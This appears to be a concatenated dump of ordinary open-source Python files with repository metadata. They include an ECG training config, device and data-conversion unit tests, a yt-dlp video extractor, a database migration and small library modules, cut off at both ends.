if q is not covered_quad:
hugging_triomino.add(q.inner_corner.copy())
q.inner_corner.is_covered = True
hugging_triomino.set_stroke(width=0)
hugging_triomino.set_fill(random_color(), opacity=1.0)
self.triominos.add(hugging_triomino)
for q in quads:
self.cover_grid(q)
|
85abcfe9415899429c8896b730475a6f5ab4f07a
|
860c31e414c4c280b70ec0872042d715a2d56978
|
/torch_ecg/databases/datasets/cinc2020/cinc2020_cfg.py
|
26bac176053886dde39371a8a3a46149f533a3f8
|
[
"MIT"
] |
permissive
|
DeepPSP/torch_ecg
|
255e49ff436e13044a1f049141f982680e56970e
|
a40c65f4fefa83ba7d3d184072a4c05627b7e226
|
refs/heads/master
| 2023-09-01T06:47:17.153216
| 2023-08-31T18:00:47
| 2023-08-31T18:00:47
| 298,482,237
| 111
| 16
|
MIT
| 2023-08-21T11:25:07
| 2020-09-25T06:03:17
|
Python
|
UTF-8
|
Python
| false
| false
| 6,262
|
py
|
cinc2020_cfg.py
|
"""
configurations for signal preprocess, feature extraction, training, etc.
along with some constants
"Brady", "LAD", "RAD", "PR", "LQRSV" are treated exceptionally, as special classes
"""
from copy import deepcopy
from typing import List
from ....cfg import CFG, DEFAULTS
from ....utils import ecg_arrhythmia_knowledge as EAK
from ...aux_data.cinc2020_aux_data import get_class_weight
__all__ = [
"CINC2020TrainCfg",
]
# special classes using special detectors
# _SPECIAL_CLASSES = ["Brady", "LAD", "RAD", "PR", "LQRSV"]
_SPECIAL_CLASSES = []
_NAME = "cinc2020"
def _assign_classes(cfg: CFG, special_classes: List[str]) -> None:
""" """
cfg.special_classes = deepcopy(special_classes)
cfg.tranche_class_weights = CFG(
{
t: get_class_weight(
t,
exclude_classes=cfg.special_classes,
scored_only=True,
threshold=20,
min_weight=cfg.min_class_weight,
)
for t in [
"A",
"B",
"AB",
"E",
"F",
]
}
)
cfg.tranche_classes = CFG(
{t: sorted(list(t_cw.keys())) for t, t_cw in cfg.tranche_class_weights.items()}
)
cfg.class_weights = get_class_weight(
tranches="ABEF",
exclude_classes=cfg.special_classes,
scored_only=True,
threshold=20,
min_weight=cfg.min_class_weight,
)
cfg.classes = sorted(list(cfg.class_weights.keys()))
# training configurations for machine learning and deep learning
CINC2020TrainCfg = CFG()
CINC2020TrainCfg.torch_dtype = DEFAULTS.DTYPE.TORCH
CINC2020TrainCfg.np_dtype = DEFAULTS.DTYPE.NP
# configs of files
CINC2020TrainCfg.db_dir = None
CINC2020TrainCfg.log_dir = DEFAULTS.log_dir / _NAME
CINC2020TrainCfg.log_dir.mkdir(parents=True, exist_ok=True)
CINC2020TrainCfg.checkpoints = DEFAULTS.checkpoints / _NAME
CINC2020TrainCfg.checkpoints.mkdir(parents=True, exist_ok=True)
CINC2020TrainCfg.model_dir = DEFAULTS.model_dir / _NAME
CINC2020TrainCfg.model_dir.mkdir(parents=True, exist_ok=True)
CINC2020TrainCfg.final_model_name = None
CINC2020TrainCfg.keep_checkpoint_max = 20
CINC2020TrainCfg.leads = deepcopy(EAK.Standard12Leads)
# configs of training data
CINC2020TrainCfg.fs = 500
CINC2020TrainCfg.data_format = "channel_first"
CINC2020TrainCfg.train_ratio = 0.8
CINC2020TrainCfg.min_class_weight = 0.5
CINC2020TrainCfg.tranches_for_training = "" # one of "", "AB", "E", "F", "G"
# assign classes, class weights, tranche classes, etc.
_assign_classes(CINC2020TrainCfg, _SPECIAL_CLASSES)
# configs of signal preprocessing
CINC2020TrainCfg.normalize = CFG(
method="z-score",
mean=0.0,
std=1.0,
)
# frequency band of the filter to apply, should be chosen very carefully
CINC2020TrainCfg.bandpass = None
# CINC2020TrainCfg.bandpass = CFG(
# lowcut=0.5,
# highcut=60,
# )
# configs of data aumentation
# CINC2020TrainCfg.label_smooth = CFG(
# prob=0.8,
# smoothing=0.1,
# )
CINC2020TrainCfg.label_smooth = False
CINC2020TrainCfg.random_masking = False
CINC2020TrainCfg.stretch_compress = False # stretch or compress in time axis
CINC2020TrainCfg.mixup = CFG(
prob=0.6,
alpha=0.3,
)
# configs of training epochs, batch, etc.
CINC2020TrainCfg.n_epochs = 50
# TODO: automatic adjust batch size according to GPU capacity
# https://stackoverflow.com/questions/45132809/how-to-select-batch-size-automatically-to-fit-gpu
CINC2020TrainCfg.batch_size = 64
# CINC2020TrainCfg.max_batches = 500500
# configs of optimizers and lr_schedulers
CINC2020TrainCfg.optimizer = "adamw_amsgrad" # "sgd", "adam", "adamw"
CINC2020TrainCfg.momentum = 0.949 # default values for corresponding PyTorch optimizers
CINC2020TrainCfg.betas = (
0.9,
0.999,
) # default values for corresponding PyTorch optimizers
CINC2020TrainCfg.decay = 1e-2 # default values for corresponding PyTorch optimizers
CINC2020TrainCfg.learning_rate = 1e-4 # 1e-3
CINC2020TrainCfg.lr = CINC2020TrainCfg.learning_rate
CINC2020TrainCfg.lr_scheduler = (
"one_cycle" # "one_cycle", "plateau", "burn_in", "step", None
)
CINC2020TrainCfg.lr_step_size = 50
CINC2020TrainCfg.lr_gamma = 0.1
CINC2020TrainCfg.max_lr = 2e-3 # for "one_cycle" scheduler, to adjust via expriments
CINC2020TrainCfg.burn_in = 400
CINC2020TrainCfg.steps = [5000, 10000]
CINC2020TrainCfg.early_stopping = CFG() # early stopping according to challenge metric
CINC2020TrainCfg.early_stopping.min_delta = 0.001 # should be non-negative
CINC2020TrainCfg.early_stopping.patience = 10
# configs of loss function
# CINC2020TrainCfg.loss = "BCEWithLogitsLoss"
# CINC2020TrainCfg.loss = "BCEWithLogitsWithClassWeightLoss"
CINC2020TrainCfg.loss = "AsymmetricLoss" # "FocalLoss"
CINC2020TrainCfg.loss_kw = CFG(gamma_pos=0, gamma_neg=0.2, implementation="deep-psp")
CINC2020TrainCfg.flooding_level = (
0.0 # flooding performed if positive, typically 0.45-0.55 for cinc2020?
)
CINC2020TrainCfg.monitor = "challenge_metric"
CINC2020TrainCfg.log_step = 20
CINC2020TrainCfg.eval_every = 20
# configs of model selection
# "resnet_nature_comm_se", "multi_scopic_leadwise", "vgg16", "vgg16_leadwise",
CINC2020TrainCfg.cnn_name = "resnet_nature_comm_bottle_neck_se"
CINC2020TrainCfg.rnn_name = "none" # "none", "lstm"
CINC2020TrainCfg.attn_name = "none" # "none", "se", "gc", "nl"
# configs of inputs and outputs
# almost all records have duration >= 8s, most have duration >= 10s
# use `utils.utils_signal.ensure_siglen` to ensure signal length
CINC2020TrainCfg.input_len = int(500 * 10.0)
# tolerance for records with length shorter than `CINC2020TrainCfg.input_len`
CINC2020TrainCfg.input_len_tol = int(0.2 * CINC2020TrainCfg.input_len)
CINC2020TrainCfg.sig_slice_tol = 0.4 # None, do no slicing
CINC2020TrainCfg.siglen = CINC2020TrainCfg.input_len
# constants for model inference
CINC2020TrainCfg.bin_pred_thr = 0.5
# `bin_pred_look_again_tol` is used when no prob is greater than `bin_pred_thr`,
# then the prediction would be the one with the highest prob.,
# along with those with prob. no less than the highest prob. minus `bin_pred_look_again_tol`
CINC2020TrainCfg.bin_pred_look_again_tol = 0.03
CINC2020TrainCfg.bin_pred_nsr_thr = 0.1
|
94bc1f4161a6007b39f08da34ed7363516b0e656
|
d571d407cfda435fcab8b7ccadb1be812c7047c7
|
/examples/guild-patch/guild_patch.py
|
6cc842552d6296a8d2d5145cf04d53b971cb5626
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
guildai/guildai
|
2d8661a2a6bf0d1ced6334095c8bf5a8e391d8af
|
149055da49f57eaf4aec418f2e339c8905c1f02f
|
refs/heads/main
| 2023-08-25T10:09:58.560059
| 2023-08-12T20:19:05
| 2023-08-12T20:19:05
| 105,057,392
| 833
| 86
|
Apache-2.0
| 2023-08-07T19:34:27
| 2017-09-27T18:57:50
|
Python
|
UTF-8
|
Python
| false
| false
| 367
|
py
|
guild_patch.py
|
import sys
from guild.util import check_guild_version
def _patch():
from guild import op
from guild import python_util
python_util.listen_function(op, "run", _patched_op_run)
def _patched_op_run(f0, op, *args, **kw):
print("You're running %s" % op.opref.to_opspec())
sys.stdout.flush()
if check_guild_version(">=0.7.1.dev1"):
_patch()
|
5d21cc1bbeb990acd5546e7b296adddaefd50be3
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/govern/data-meta/amundsen/databuilder/databuilder/__init__.py
|
6f1d8f2fb467d5b4ed3db3d3015933d5307eb773
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"MIT"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 2,697
|
py
|
__init__.py
|
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import abc
from pyhocon import ConfigFactory, ConfigTree
class Scoped(object, metaclass=abc.ABCMeta):
_EMPTY_CONFIG = ConfigFactory.from_dict({})
"""
An interface for class that works with scoped (nested) config.
https://github.com/chimpler/pyhocon
A scoped instance will use config within its scope. This is a way to
distribute configuration to its implementation instead of having it in
one central place.
This is very useful for DataBuilder as it has different components
(extractor, transformer, loader, publisher) and its component itself
could have different implementation.
For example these can be a configuration for two different extractors
"extractor.mysql.url" for MySQLExtractor
"extractor.filesystem.source_path" for FileSystemExtractor
For MySQLExtractor, if you defined scope as "extractor.mysql", scoped
config will basically reduce it to the config that is only for MySQL.
config.get("extractor.mysql") provides you all the config within
'extractor.mysql'. By removing outer context from the config,
MySQLExtractor is highly reusable.
"""
@abc.abstractmethod
def init(self, conf: ConfigTree) -> None:
"""
All scoped instance is expected to be lazily initialized. Means that
__init__ should not have any heavy operation such as service call.
The reason behind is that Databuilder is a code at the same time,
code itself is used as a configuration. For example, you can
instantiate scoped instance with all the parameters already set,
ready to run, and actual execution will be executing init() and
execute.
:param conf: Typesafe config instance
:return: None
"""
pass
@abc.abstractmethod
def get_scope(self) -> str:
"""
A scope for the config. Typesafe config supports nested config.
Scope, string, is used to basically peel off nested config
:return:
"""
return ''
def close(self) -> None:
"""
Anything that needs to be cleaned up after the use of the instance.
:return: None
"""
pass
@classmethod
def get_scoped_conf(cls, conf: ConfigTree, scope: str) -> ConfigTree:
"""
Convenient method to provide scoped method.
:param conf: Type safe config instance
:param scope: scope string
:return: Type safe config instance
"""
if not scope:
return Scoped._EMPTY_CONFIG
return conf.get(scope, Scoped._EMPTY_CONFIG)
|
af69cc02484182f35863a5486cf8c4ea85f39819
|
7442c958dc2522be2e2adcd1d28acf9527d1b5ef
|
/reapy/core/audio_accessor.py
|
0656e1ea4911cc0e1e73788c3b0926d0e0b3c330
|
[
"MIT"
] |
permissive
|
RomeoDespres/reapy
|
0227bef82828521b836548f5b2115ee354eabcd7
|
730627cee6f39fc26d6ebc8a3df0112e5921cd9f
|
refs/heads/master
| 2022-02-21T02:37:47.456052
| 2021-02-11T08:26:33
| 2021-02-11T08:26:33
| 168,827,206
| 104
| 31
|
MIT
| 2022-02-04T19:13:32
| 2019-02-02T12:00:27
|
Python
|
UTF-8
|
Python
| false
| false
| 2,285
|
py
|
audio_accessor.py
|
import reapy
import reapy.reascript_api as RPR
from reapy.core import ReapyObject
class AudioAccessor(ReapyObject):
def __init__(self, id):
self.id = id
@property
def _args(self):
return self.id,
def delete(self):
"""Delete audio accessor."""
RPR.DestroyAudioAccessor(self.id)
@property
def end_time(self):
"""
End time of audio that can be returned from this accessor.
Return value is in seconds.
:type: float
"""
return RPR.GetAudioAccessorEndTime(self.id)
def get_samples(
self, start, n_samples_per_channel, n_channels=1, sample_rate=44100
):
"""
Return audio samples.
Parameters
----------
start : float
Start time in seconds.
n_samples_per_channel : int
Number of required samples per channel
n_channels : int, optional
Number of required channels (default=1).
sample_rate : float, optional
Required sample rate (default=44100).
Returns
-------
samples : list
List of length n_samples*n_channels.
Examples
--------
To separate channels use:
>>> samples = audio_accessor.get_samples(0, 1024, 2)
>>> first_channel = samples[::2]
>>> second_channel = samples[1::2]
"""
buffer = [0]*n_channels*n_samples_per_channel
samples = RPR.GetAudioAccessorSamples(
self.id, sample_rate, n_channels, start, n_samples_per_channel,
buffer
)[1]
return samples
@property
def has_state_changed(self):
"""
Whether underlying state has changed.
:type: bool
"""
return bool(RPR.AudioAccessorValidateState(self.id))
def hash(self):
"""
String that changes only if the underlying samples change.
:type: str
"""
return RPR.GetAudioAccessorHash(self.id, "")[1]
@property
def start_time(self):
"""
Start time of audio that can be returned from this accessor.
Return value is in seconds.
:type: float
"""
return RPR.GetAudioAccessorStartTime(self.id)
|
57a7c71ab8e3fa88649f69a3d0f34abe9f0811eb
|
6fdb4eaf5b0e6dbd7db4bf947547541e9aebf110
|
/api/tests/opentrons/protocol_engine/execution/test_thermocycler_plate_lifter.py
|
67f8cee04b84fb501eaf332886e2206051285e81
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
Opentrons/opentrons
|
874321e01149184960eeaeaa31b1d21719a1ceda
|
026b523c8c9e5d45910c490efb89194d72595be9
|
refs/heads/edge
| 2023-09-02T02:51:49.579906
| 2023-08-31T16:02:45
| 2023-08-31T16:02:45
| 38,644,841
| 326
| 174
|
Apache-2.0
| 2023-09-14T21:47:20
| 2015-07-06T20:41:01
|
Python
|
UTF-8
|
Python
| false
| false
| 4,940
|
py
|
test_thermocycler_plate_lifter.py
|
"""Test thermocycler plate lifter execution side effects."""
from __future__ import annotations
import pytest
from decoy import Decoy, matchers
from opentrons.protocol_engine.types import (
ModuleLocation,
ModuleModel,
DeckSlotLocation,
)
from opentrons.protocol_engine.execution import EquipmentHandler, MovementHandler
from opentrons.protocol_engine.execution.thermocycler_plate_lifter import (
ThermocyclerPlateLifter,
)
from opentrons.protocol_engine.state import (
StateStore,
ThermocyclerModuleId,
ThermocyclerModuleSubState,
)
from opentrons.hardware_control.modules import Thermocycler
from opentrons.types import DeckSlotName
@pytest.fixture
def state_store(decoy: Decoy) -> StateStore:
"""Get a mocked out StateStore instance."""
return decoy.mock(cls=StateStore)
@pytest.fixture
def equipment(decoy: Decoy) -> EquipmentHandler:
"""Get a mocked out EquipmentHandler instance."""
return decoy.mock(cls=EquipmentHandler)
@pytest.fixture
def movement(decoy: Decoy) -> MovementHandler:
"""Get a mocked out MovementHandler."""
return decoy.mock(cls=MovementHandler)
@pytest.fixture
def subject(
state_store: StateStore,
equipment: EquipmentHandler,
movement: MovementHandler,
) -> ThermocyclerPlateLifter:
"""Get ThermocyclerPlateLifter with its dependencies mocked out."""
return ThermocyclerPlateLifter(
state_store=state_store,
equipment=equipment,
movement=movement,
)
async def test_lift_plate_for_labware_movement_from_tc_gen2(
decoy: Decoy,
state_store: StateStore,
equipment: EquipmentHandler,
movement: MovementHandler,
subject: ThermocyclerPlateLifter,
) -> None:
"""It should execute plate lift if moving labware from TC Gen2."""
labware_location = ModuleLocation(moduleId="thermocycler-id")
tc_hardware = decoy.mock(cls=Thermocycler)
decoy.when(state_store.modules.get_connected_model("thermocycler-id")).then_return(
ModuleModel.THERMOCYCLER_MODULE_V2
)
decoy.when(
equipment.get_module_hardware_api(
ThermocyclerModuleId(labware_location.moduleId)
)
).then_return(tc_hardware)
decoy.when(
state_store.modules.get_thermocycler_module_substate("thermocycler-id")
).then_return(
ThermocyclerModuleSubState(
module_id=ThermocyclerModuleId("abc"),
is_lid_open=True,
target_block_temperature=None,
target_lid_temperature=None,
)
)
async with subject.lift_plate_for_labware_movement(
labware_location=labware_location
):
decoy.verify(
await movement.home(axes=None),
await tc_hardware.lift_plate(),
await tc_hardware.raise_plate(),
)
decoy.verify(
await tc_hardware.return_from_raise_plate(),
)
async def test_do_not_lift_plate_if_not_in_tc_gen2(
decoy: Decoy,
state_store: StateStore,
movement: MovementHandler,
subject: ThermocyclerPlateLifter,
) -> None:
"""It should execute plate lift if moving labware from TC Gen2."""
decoy.when(state_store.modules.get_connected_model("thermocycler-id")).then_return(
ModuleModel.THERMOCYCLER_MODULE_V1
)
async with subject.lift_plate_for_labware_movement(
labware_location=ModuleLocation(moduleId="thermocycler-id")
):
pass
decoy.verify(
await movement.home(axes=matchers.Anything()),
times=0,
)
async with subject.lift_plate_for_labware_movement(
labware_location=DeckSlotLocation(slotName=DeckSlotName.SLOT_2)
):
pass
decoy.verify(
await movement.home(axes=matchers.Anything()),
times=0,
)
async def test_do_not_lift_plate_with_lid_closed(
decoy: Decoy,
state_store: StateStore,
equipment: EquipmentHandler,
movement: MovementHandler,
subject: ThermocyclerPlateLifter,
) -> None:
"""It should not issue plate lift if lid is not open."""
labware_location = ModuleLocation(moduleId="thermocycler-id")
tc_hardware = decoy.mock(cls=Thermocycler)
decoy.when(state_store.modules.get_connected_model("thermocycler-id")).then_return(
ModuleModel.THERMOCYCLER_MODULE_V2
)
decoy.when(
equipment.get_module_hardware_api(
ThermocyclerModuleId(labware_location.moduleId)
)
).then_return(tc_hardware)
decoy.when(
state_store.modules.get_thermocycler_module_substate("thermocycler-id")
).then_return(
ThermocyclerModuleSubState(
module_id=ThermocyclerModuleId("abc"),
is_lid_open=False,
target_block_temperature=None,
target_lid_temperature=None,
)
)
with pytest.raises(AssertionError):
async with subject.lift_plate_for_labware_movement(
labware_location=labware_location
):
pass
|
7cd4dec97c1e8922795c81e56a828a56851d90b0
|
855b013907d33b7e1bb74f688e5314b0e9bae510
|
/python-package/test/test_data_conversion.py
|
b9a3d0dd3e21eed5df5e3e4e7f49db438105d970
|
[
"Apache-2.0"
] |
permissive
|
aksnzhy/xlearn
|
5b3f3aa29b31c7080a3e0835f073d34157878c44
|
4c240aa0aa63c1d105fb9aec583adc2ad2840368
|
refs/heads/master
| 2023-09-01T08:44:21.447056
| 2022-06-05T10:44:18
| 2022-06-05T10:44:18
| 93,925,242
| 3,261
| 624
|
Apache-2.0
| 2023-08-28T05:18:27
| 2017-06-10T08:09:31
|
C++
|
UTF-8
|
Python
| false
| false
| 5,138
|
py
|
test_data_conversion.py
|
# Copyright (c) 2018 by contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
# This file test the data conversion for sklearn API
import unittest
import tempfile
import os
import numpy as np
from xlearn import write_data_to_xlearn_format
from scipy.sparse import csr_matrix
from sklearn.datasets import load_svmlight_file
class TestDataConversion(unittest.TestCase):
"""
Test data conversion to libsvm and libffm inside LRModel, FMModel and FFMModel
"""
def setUp(self):
# data generation
self.num_rows = 10
self.num_features = 4
self.X = np.random.randn(self.num_rows, self.num_features)
self.X[self.X < 0] = 0 # introduce sparsity
self.y = np.random.binomial(1, 0.5, size=(self.num_rows, 1))
self.fields = np.array([1, 2, 1, 0])
def _read_libffm_file(self, filename):
"""
An internal function for reading libffm back to numpy array.
"""
X_true = np.zeros((self.num_rows, self.num_features))
y_true = np.zeros((self.num_rows, 1))
field_true = np.zeros((self.num_features, 1))
with open(filename, 'r') as f:
i = 0
for line in f:
tmp_row = line.replace('\n', '').split(' ')
# extract label
y_true[i] = int(tmp_row[0])
# extract data and fields
for k in range(1, len(tmp_row)):
if len(tmp_row[k]) > 0:
tmp_str = tmp_row[k].split(':')
j = int(tmp_str[1])
field_true[j] = int(tmp_str[0])
tmp_data = float(tmp_str[2])
X_true[i, j] = tmp_data
i = i + 1
return X_true, y_true, field_true
def test_convert_numpy_to_libsvm(self):
"""
Test if the conversion between libsvm and numpy array is correct
"""
file = tempfile.NamedTemporaryFile(delete=False)
# write to temporary files
write_data_to_xlearn_format(self.X, self.y, file.name)
# load data back and compare if they are the same as original data
X_true, y_true = load_svmlight_file(file.name)
file.close()
if os.path.exists(file.name):
os.remove(file.name)
assert np.all(np.isclose(self.X, X_true.todense()))
assert np.all(self.y.ravel() == y_true.ravel())
def test_convert_csr_to_libsvm(self):
"""
Test if the conversion between libsvm and csr matrix is correct
"""
X_spase = csr_matrix(self.X)
file = tempfile.NamedTemporaryFile(delete=False)
# write to temporary files
write_data_to_xlearn_format(X_spase, self.y, file.name)
# load data back and compare if they are the same as original data
X_true, y_true = load_svmlight_file(file.name)
file.close()
if os.path.exists(file.name):
os.remove(file.name)
assert np.all(np.isclose(X_spase.todense(), X_true.todense()))
assert np.all(self.y.ravel() == y_true.ravel())
def test_convert_numpy_to_libffm(self):
"""
Test if the conversion between libffm and numpy array is correct
"""
file = tempfile.NamedTemporaryFile(delete=False)
# write data to libffm format
write_data_to_xlearn_format(self.X, self.y, file.name, fields=self.fields)
# read back data from file
X_true, y_true, field_true = self._read_libffm_file(file.name)
file.close()
if os.path.exists(file.name):
os.remove(file.name)
assert np.all(np.isclose(self.X, X_true))
assert np.all(self.y.ravel() == y_true.ravel())
assert np.all(self.fields.ravel() == field_true.ravel())
def test_convert_csr_to_libffm(self):
"""
Test if the conversion between libffm and csr matrix is correct
"""
X_sparse = csr_matrix(self.X)
file = tempfile.NamedTemporaryFile(delete=False)
# write data to libffm format
write_data_to_xlearn_format(X_sparse, self.y, file.name, fields=self.fields)
# read back data from file
X_true, y_true, field_true = self._read_libffm_file(file.name)
file.close()
if os.path.exists(file.name):
os.remove(file.name)
assert np.all(np.isclose(X_sparse.todense(), X_true))
assert np.all(self.y.ravel() == y_true.ravel())
assert np.all(self.fields.ravel() == field_true.ravel())
if __name__ == '__main__':
unittest.main()
|
e2257dada805b739e46809c2a9538c02629647e1
|
6c37d1d2437a08e43b13d621d4a8da4da7135b3a
|
/yt_dlp/extractor/sevenplus.py
|
6c688d1505ed5a718a53b55bb2d757f458d2aab6
|
[
"Unlicense",
"GPL-2.0-or-later",
"MPL-2.0",
"BSD-3-Clause",
"GPL-3.0-or-later",
"LGPL-2.1-only",
"BSD-2-Clause",
"MIT"
] |
permissive
|
yt-dlp/yt-dlp
|
be040bde10cc40258c879c75ab30215686352824
|
d3d81cc98f554d0adb87d24bfd6fabaaa803944d
|
refs/heads/master
| 2023-09-05T21:15:21.050538
| 2023-09-05T20:35:23
| 2023-09-05T20:35:23
| 307,260,205
| 52,742
| 5,376
|
Unlicense
| 2023-09-14T05:22:08
| 2020-10-26T04:22:55
|
Python
|
UTF-8
|
Python
| false
| false
| 4,955
|
py
|
sevenplus.py
|
import json
import re
from .brightcove import BrightcoveNewBaseIE
from ..compat import compat_str
from ..networking.exceptions import HTTPError
from ..utils import (
ExtractorError,
try_get,
update_url_query,
)
class SevenPlusIE(BrightcoveNewBaseIE):
IE_NAME = '7plus'
_VALID_URL = r'https?://(?:www\.)?7plus\.com\.au/(?P<path>[^?]+\?.*?\bepisode-id=(?P<id>[^&#]+))'
_TESTS = [{
'url': 'https://7plus.com.au/MTYS?episode-id=MTYS7-003',
'info_dict': {
'id': 'MTYS7-003',
'ext': 'mp4',
'title': 'S7 E3 - Wind Surf',
'description': 'md5:29c6a69f21accda7601278f81b46483d',
'uploader_id': '5303576322001',
'upload_date': '20171201',
'timestamp': 1512106377,
'series': 'Mighty Ships',
'season_number': 7,
'episode_number': 3,
'episode': 'Wind Surf',
},
'params': {
'skip_download': True,
}
}, {
'url': 'https://7plus.com.au/UUUU?episode-id=AUMS43-001',
'only_matching': True,
}]
def _real_initialize(self):
self.token = None
cookies = self._get_cookies('https://7plus.com.au')
api_key = next((x for x in cookies if x.startswith('glt_')), '')[4:]
if not api_key: # Cookies are signed out, skip login
return
login_resp = self._download_json(
'https://login.7plus.com.au/accounts.getJWT', None, 'Logging in', fatal=False,
query={
'APIKey': api_key,
'sdk': 'js_latest',
'login_token': cookies[f'glt_{api_key}'].value,
'authMode': 'cookie',
'pageURL': 'https://7plus.com.au/',
'sdkBuild': '12471',
'format': 'json',
}) or {}
if 'errorMessage' in login_resp:
self.report_warning(f'Unable to login: 7plus said: {login_resp["errorMessage"]}')
return
id_token = login_resp.get('id_token')
if not id_token:
self.report_warning('Unable to login: Could not extract id token')
return
token_resp = self._download_json(
'https://7plus.com.au/auth/token', None, 'Getting auth token', fatal=False,
headers={'Content-Type': 'application/json'}, data=json.dumps({
'idToken': id_token,
'platformId': 'web',
'regSource': '7plus',
}).encode('utf-8')) or {}
self.token = token_resp.get('token')
if not self.token:
self.report_warning('Unable to log in: Could not extract auth token')
def _real_extract(self, url):
path, episode_id = self._match_valid_url(url).groups()
headers = {}
if self.token:
headers['Authorization'] = f'Bearer {self.token}'
try:
media = self._download_json(
'https://videoservice.swm.digital/playback', episode_id, query={
'appId': '7plus',
'deviceType': 'web',
'platformType': 'web',
'accountId': 5303576322001,
'referenceId': 'ref:' + episode_id,
'deliveryId': 'csai',
'videoType': 'vod',
}, headers=headers)['media']
except ExtractorError as e:
if isinstance(e.cause, HTTPError) and e.cause.status == 403:
raise ExtractorError(self._parse_json(
e.cause.response.read().decode(), episode_id)[0]['error_code'], expected=True)
raise
for source in media.get('sources', {}):
src = source.get('src')
if not src:
continue
source['src'] = update_url_query(src, {'rule': ''})
info = self._parse_brightcove_metadata(media, episode_id)
content = self._download_json(
'https://component-cdn.swm.digital/content/' + path,
episode_id, headers={
'market-id': 4,
}, fatal=False) or {}
for item in content.get('items', {}):
if item.get('componentData', {}).get('componentType') == 'infoPanel':
for src_key, dst_key in [('title', 'title'), ('shortSynopsis', 'description')]:
value = item.get(src_key)
if value:
info[dst_key] = value
info['series'] = try_get(
item, lambda x: x['seriesLogo']['name'], compat_str)
mobj = re.search(r'^S(\d+)\s+E(\d+)\s+-\s+(.+)$', info['title'])
if mobj:
info.update({
'season_number': int(mobj.group(1)),
'episode_number': int(mobj.group(2)),
'episode': mobj.group(3),
})
return info
|
b9e1d6a5de4b193316968e47488a024c4af9886f
|
c530897cb72b6943c7226b25824444cad5f3503b
|
/usaspending_api/recipient/migrations/0024_recipient_profile_index_rename.py
|
8e963e399f6c0563af1c65612f787b36c00b611f
|
[
"CC0-1.0"
] |
permissive
|
fedspendingtransparency/usaspending-api
|
fc63a22d32ea0207b7273d3e1ef26ba9dbabc42a
|
38f920438697930ae3ac57bbcaae9034877d8fb7
|
refs/heads/master
| 2023-09-01T22:00:36.633612
| 2023-08-29T18:39:18
| 2023-08-29T18:39:18
| 65,394,827
| 276
| 118
|
CC0-1.0
| 2023-09-14T20:33:15
| 2016-08-10T15:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 517
|
py
|
0024_recipient_profile_index_rename.py
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("recipient", "0023_shorter_index_names"),
]
operations = [
migrations.RunSQL(
sql="ALTER INDEX recipient_profile_recipient_hash_recipient_level_ee7ecd55_uniq RENAME TO rp_recipient_hash_level_ee7ecd55_uniq",
reverse_sql="ALTER INDEX rp_recipient_hash_level_ee7ecd55_uniq RENAME TO recipient_profile_recipient_hash_recipient_level_ee7ecd55_uniq",
),
]
|
dc542cc19dbadeff2ff00b840063b92adb996006
|
2b5ffa18e7198e45fa77674b96dac8d91159fed7
|
/djangae/contrib/common/__init__.py
|
0e389e373818ab5008801a6a6280994975c74917
|
[
"BSD-3-Clause"
] |
permissive
|
potatolondon/djangae
|
73681d0c8302ac216f74bc00b980de368e8d4280
|
bef308632790bb6f87e71bb91183f57bad6bd149
|
refs/heads/master
| 2023-09-01T15:27:51.995232
| 2023-08-30T14:40:48
| 2023-08-30T14:40:48
| 10,217,788
| 474
| 155
|
BSD-3-Clause
| 2023-02-08T01:05:31
| 2013-05-22T10:55:55
|
Python
|
UTF-8
|
Python
| false
| false
| 125
|
py
|
__init__.py
|
import threading
_thread_locals = threading.local()
def get_request():
return getattr(_thread_locals, 'request', None)
|
40aa642a6c559d9de5a7fb9551186dac9106f9fb
|
6df06b8581a29e93f8d375211ec6ac2626839592
|
/tests/unit/common/objects/test_verification.py
|
03c8d96de8b8fed6e3e1f8c3f18a846921f1ed72
|
[
"Apache-2.0"
] |
permissive
|
openstack/rally
|
415ed0513ce2a99cdaf0dabc1ae4f14cd200db89
|
e8613ffeb01f109083f6a75dd148d5a8d37c9564
|
refs/heads/master
| 2023-09-04T05:35:11.862008
| 2023-05-19T21:31:59
| 2023-05-23T08:09:06
| 12,645,326
| 278
| 291
|
Apache-2.0
| 2023-04-22T02:34:29
| 2013-09-06T13:58:01
|
Python
|
UTF-8
|
Python
| false
| false
| 6,230
|
py
|
test_verification.py
|
# Copyright 2016: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime as dt
from unittest import mock
from rally.common import objects
from rally import consts
from tests.unit import test
class VerificationTestCase(test.TestCase):
def setUp(self):
super(VerificationTestCase, self).setUp()
self.db_obj = {"uuid": "uuid-1",
"env_uuid": "e_uuid"}
self._db_entry = {}
@mock.patch("rally.common.objects.verification.db.verification_create")
def test_init(self, mock_verification_create):
v = objects.Verification(self.db_obj)
self.assertEqual(0, mock_verification_create.call_count)
self.assertEqual(self.db_obj["uuid"], v.uuid)
self.assertEqual(self.db_obj["uuid"], v["uuid"])
def test_to_dict(self):
